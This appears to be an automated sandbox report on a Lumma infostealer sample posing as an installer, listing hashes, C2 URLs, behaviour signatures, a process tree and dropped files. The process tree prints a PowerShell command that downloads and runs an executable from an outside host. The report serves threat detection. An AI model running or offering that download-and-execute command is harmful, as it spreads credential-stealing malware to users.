Overview

overview

10

Static

static

3

πŸŒΌπ’©οΏ½...up.exe

windows10-ltsc 2021-x64

10

πŸŒΌπ’©οΏ½...up.exe

windows11-21h2-x64

10

πŸŒΌπ’©οΏ½...up.exe

windows7-x64

3

Analysis

  • max time kernel
    92s
  • max time network
    134s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    01/03/2025, 12:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    πŸŒΌπ’©π‘’π“Œβœ³π‚π“Έπ’Ήπ‘’βœ¨πΞ±Ο„Β’Π½-π“˜nst𝒢ll@9192/Setup.exe

  • Size

    168KB

  • MD5

    aef6452711538d9021f929a2a5f633cf

  • SHA1

    205b7fab75e77d1ff123991489462d39128e03f6

  • SHA256

    e611a1ffbe9e08a2660bc290a581aa0b54637524aaf6040a70e54f97136ce5ac

  • SHA512

    7ad84d4d3bab3f5a3e14f336d8931bf4b876299000081b2a94a3fcf698c56b82514753b483c5b8d7ae84ddd92ee1c4043fa5e7fb7c4f7e9eb52ca8c794e508b7

  • SSDEEP

    3072:+CNUaViEqjY1uimO3soWBgZNENeo0TzSCOtCUon/BA2gGaA44:dwEq7HO8ohEsxHSC+CUO/Bxk4

Score
10/10
lummadiscoveryexecutionspywarestealer

Malware Config

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\πŸŒΌπ’©π‘’π“Œβœ³π‚π“Έπ’Ήπ‘’βœ¨πΞ±Ο„Β’Π½-π“˜nst𝒢ll@9192\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\πŸŒΌπ’©π‘’π“Œβœ³π‚π“Έπ’Ήπ‘’βœ¨πΞ±Ο„Β’Π½-π“˜nst𝒢ll@9192\Setup.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:4740
    • C:\Users\Admin\AppData\Roaming\XXX\RONQWHGUMEYVKJUOL\Caller.exe
      C:\Users\Admin\AppData\Roaming\XXX\RONQWHGUMEYVKJUOL\Caller.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4628
    • C:\Windows\SysWOW64\more.com
      C:\Windows\SysWOW64\more.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:3228
      • C:\ProgramData\Lawai.com
        C:\ProgramData\Lawai.com
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3744
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\24OHJGVS1ZKOU973LFQHYTMTC7G.ps1"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1800
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\GA37KPB8HI1IZV3ARB3PH5TL6.ps1"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2308
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -exec bypass $Response = Invoke-WebRequest -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' -Uri 'https://myspecialdot.com/api/download' -UseBasicParsing $TempFile = [System.IO.Path]::GetTempFileName() $FilePath = "$($TempFile).exe" [System.IO.File]::WriteAllBytes($FilePath, $Response.Content) Start-Process -FilePath $FilePathASYCzq:
          4⤵
          • Command and Scripting Interpreter: PowerShell
          PID:3300
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 1324
          4⤵
          • Program crash
          PID:1868
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3744 -ip 3744
    1⤵
      PID:3920

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Lawai.com
      Filesize

      921KB

      MD5

      3f58a517f1f4796225137e7659ad2adb

      SHA1

      e264ba0e9987b0ad0812e5dd4dd3075531cfe269

      SHA256

      1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48

      SHA512

      acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      1KB

      MD5

      c3c8c7edc7bdeb3c512771a68bd878ab

      SHA1

      0be3d1e296640d418a890041fd5d3b12ceea71df

      SHA256

      136776ac6adcb472e0ed37035f6f773df3fb5d347f017fea3f1f2af0b103e5f2

      SHA512

      dc9bdc7f504cefb344dbeaaf11f924c4cebaefa4dcaa02fdff2baca56f4864c4f81a49c525db7c9f7cc2cfa306f4c8bdfbce1043b9182d94627de76d1805e33f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\24OHJGVS1ZKOU973LFQHYTMTC7G.ps1
      Filesize

      3KB

      MD5

      9ef303f48303b543c7dea68f560fe795

      SHA1

      5a6f91757e10df8f07077ec9ab463f0f67bb582f

      SHA256

      464507f2c132da0b5aaa45f95372871dd14c42d1a156ac746f602aa41ccfbb2e

      SHA512

      7f16fbfac763bb940fab1083a990c0b1527c3e9e38276e8c1cb13b3622c6b426f129d6c79d7d42cffe5ec7e3490f0afef41a154c85baf503b3b27b26f8e66f0d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\78289c2e
      Filesize

      6.1MB

      MD5

      7cb3c02f70cfa9622a4987b7aceda081

      SHA1

      f5ac2c55d72330166193154cc85ca502f1c4cd9a

      SHA256

      6fa455b2fb73cb4cc7f3095d212fde3372eea717f277b2bd7d59399247b1f034

      SHA512

      6abc2a95932c0ef9bbbfeadc0a55236f82b56b6245199d5fa94afdad5b34d3e1d4a9354168ac268b9133923a2a9f6efc6b74fe0e5d18fea5ad659ed51e89cf4c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\GA37KPB8HI1IZV3ARB3PH5TL6.ps1
      Filesize

      474B

      MD5

      108a846fce8e14bec7a3a8c2850d8ed1

      SHA1

      44075cdd5403feadd753986ce39fbc672ca9c69a

      SHA256

      300c5bfa2b54a6c48fb592ba9f2a164dc92d796688f3e43112e696e68a09ed88

      SHA512

      c2f03dad5d470b779de7e2fe36e26c3b112b4f82db76cd5ebd30da71649f1f26326db0632b1dc2bcbe7b80804d4dc8d878b058ce9798bd5d35b722212f6c78da

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_54vt4y1y.vvl.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\XXX\RONQWHGUMEYVKJUOL\Caller.exe
      Filesize

      4.2MB

      MD5

      2018644aac84a2de8a767ec1da19993e

      SHA1

      4ec18507a02d88f49a089851e773c082327ffa42

      SHA256

      d2251490ca5bd67e63ea52a65bbff8823f2012f417ad0bd073366c02aa0b3828

      SHA512

      4b171ce616756ace308b61d3d2cc43ced952ce4dc04360ab18499cc959cbf08dc5331610f7bb59c34fcdcb72694b455dc556757cba4cb1ed17b78503bcc26c48

      Download Submit

    • memory/1800-34-0x0000000002D50000-0x0000000002D86000-memory.dmp

      Filesize

      216KB

      Download

    • memory/1800-59-0x0000000006410000-0x000000000645C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1800-58-0x00000000063C0000-0x00000000063DE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1800-38-0x0000000005D70000-0x0000000005DD6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1800-37-0x0000000005C50000-0x0000000005CB6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1800-36-0x0000000005360000-0x0000000005382000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2308-57-0x0000000005EA0000-0x00000000061F7000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2308-35-0x0000000005760000-0x0000000005E2A000-memory.dmp

      Filesize

      6.8MB

      Download

    • memory/3228-21-0x00007FFC01CD0000-0x00007FFC01EC8000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/3228-23-0x0000000076930000-0x0000000076F07000-memory.dmp

      Filesize

      5.8MB

      Download

    • memory/3744-30-0x00007FFC01CD0000-0x00007FFC01EC8000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/3744-29-0x0000000000530000-0x0000000000584000-memory.dmp

      Filesize

      336KB

      Download

    • memory/3744-60-0x0000000000530000-0x0000000000584000-memory.dmp

      Filesize

      336KB

      Download

    • memory/4740-8-0x0000000076930000-0x0000000076F07000-memory.dmp

      Filesize

      5.8MB

      Download

    • memory/4740-11-0x0000000076930000-0x0000000076F07000-memory.dmp

      Filesize

      5.8MB

      Download

    • memory/4740-0-0x0000000002220000-0x00000000022F1000-memory.dmp

      Filesize

      836KB

      Download

    • memory/4740-17-0x0000000076930000-0x0000000076F07000-memory.dmp

      Filesize

      5.8MB

      Download

    • memory/4740-16-0x000000000235B000-0x0000000002C38000-memory.dmp

      Filesize

      8.9MB

      Download

    • memory/4740-15-0x0000000002300000-0x0000000003C31000-memory.dmp

      Filesize

      25.2MB

      Download

    • memory/4740-9-0x00007FFC01CD0000-0x00007FFC01EC8000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/4740-4-0x0000000002300000-0x0000000003C31000-memory.dmp

      Filesize

      25.2MB

      Download

    • memory/4740-3-0x0000000000600000-0x0000000000601000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4740-2-0x000000000235B000-0x0000000002C38000-memory.dmp

      Filesize

      8.9MB

      Download